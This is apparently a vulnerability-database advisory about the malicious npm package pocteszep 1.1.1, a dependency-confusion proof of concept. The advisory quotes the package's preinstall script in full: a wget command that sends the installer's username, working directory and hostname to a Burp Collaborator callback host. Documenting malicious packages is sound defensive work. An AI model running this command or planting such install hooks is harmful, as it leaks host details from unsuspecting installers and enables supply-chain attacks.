pocteszep @1.1.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5544
Ecosystem
npm
Summary
The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install , before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker.
Source: amazon-inspector (e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.